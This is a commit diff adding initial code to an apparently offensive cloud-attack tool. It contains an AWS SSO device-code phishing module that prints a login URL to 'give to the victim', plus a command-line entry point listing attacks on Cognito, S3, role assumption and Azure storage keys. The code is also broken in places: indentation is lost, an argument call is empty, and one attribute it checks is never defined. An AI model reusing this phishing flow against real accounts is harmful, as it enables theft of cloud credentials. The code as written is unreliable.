STRLCPY/ThunderCloud

adding initial code
shivankar committed 2 years ago

6f0c96e1

1 parent dfddf7b1

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

clouds/aws/sso.py

1	+	# link expires in 6mins/ verify it and update script
2	+	# update script to extract tokens after link is clicked
3	+	# also update script to assume roles from the list
4	+	# after assuming roles, enumerate permissions
5	+	import boto3
6	+
7	+	class AWSSSO:
8	+	pass
9	+	def attack(self):
10	+	region = "us-east-2"
11	+	url = "https://something.awsapps.com"
12	+	sso_oidc = boto3.client('sso-oidc', region_name= region)
13	+	client = sso_oidc.register_client(
14	+	client_name = 'thundercloud',
15	+	client_type = 'public'
16	+	)
17	+	client_id = client.get('clientId')
18	+	client_secret = client.get('clientSecret')
19	+	authz = sso_oidc.start_device_authorization(
20	+	clientId = client_id,
21	+	client_secret = client_secret,
22	+	startUrl = url
23	+	)
24	+	url = authz.get('verificationUriComplete')
25	+	deviceCode = authz.get('deviceCode')
26	+	print(client_id, client_secret, deviceCode)
27	+	print("Give this URL to the victim" + url)

■ ■ ■ ■ ■ ■

main.py

1	+	import argparse
2	+
3	+	def main():
4	+	"""Main function"""
5	+	parser = argparse.ArgumentParser(description='Attack modules of cloud AWS')
6	+	parser.add_argument('-ce', '--cognito_endpoint', help='to verify if cognito endpoint is vulnerable '
7	+	'and to extract credentials')
8	+	parser.add_argument('-sso', '--sso_url', help='AWS SSO URL to phish for AWS credentials')
9	+	parser.add_argument('-enum-roles', '--enumerate_roles', help='To enumerate account roles in victim AWS roles')
10	+	parser.add_argument('-s3', '--s3_bucket_name', help='Execute 7 attacks on S3 bucket')
11	+	parser.add_argument('-asum_role', '--assume_role', help='Privilege escalation for assuming roles')
12	+	parser.add_argument('-conn_string', '--connection_string', help='Azure Shared Access key for reading'
13	+	'servicebus/queues/blobs etc')
14	+	parser.add_argument('-blob', '--blob', help='Azure blob enumeration')
15	+	parser.add_argument()
16	+	args = parser.parse_args()
17	+	if args.cognito_endpoint:
18	+	from clouds.aws.cognito import Cognito
19	+	attack_cognito = Cognito()
20	+	attack_cognito.attack()
21	+	elif args.sso_url:
22	+	from clouds.aws.sso import AWSSSO
23	+	attack_sso = AWSSSO()
24	+	attack_sso.attack()
25	+	elif args.enumerate_roles:
26	+	from clouds.aws.enum import EnumRoles
27	+	attack_roles = EnumRoles()
28	+	attack_roles.attack()
29	+	elif args.s3_bucket_name:
30	+	from clouds.aws.s3 import S3
31	+	attack_s3 = S3()
32	+	attack_s3.attack()
33	+	elif args.assume_role:
34	+	from clouds.aws.assume import AsumRole
35	+	attack_roles = AsumRole()
36	+	attack_roles.attack()
37	+	elif args.shared_access_key:
38	+	from clouds.azure.keys import ConnectionString
39	+	attack_keys = ConnectionString()
40	+	attack_keys.attack()
41	+	elif args.blob:
42	+	from clouds.azure.blob import Blob
43	+	attack_blob = Blob()
44	+	attack_blob.attack()
45	+
46	+
47	+
48	+	if __name__ == '__main__':
49	+	main()

adding initial code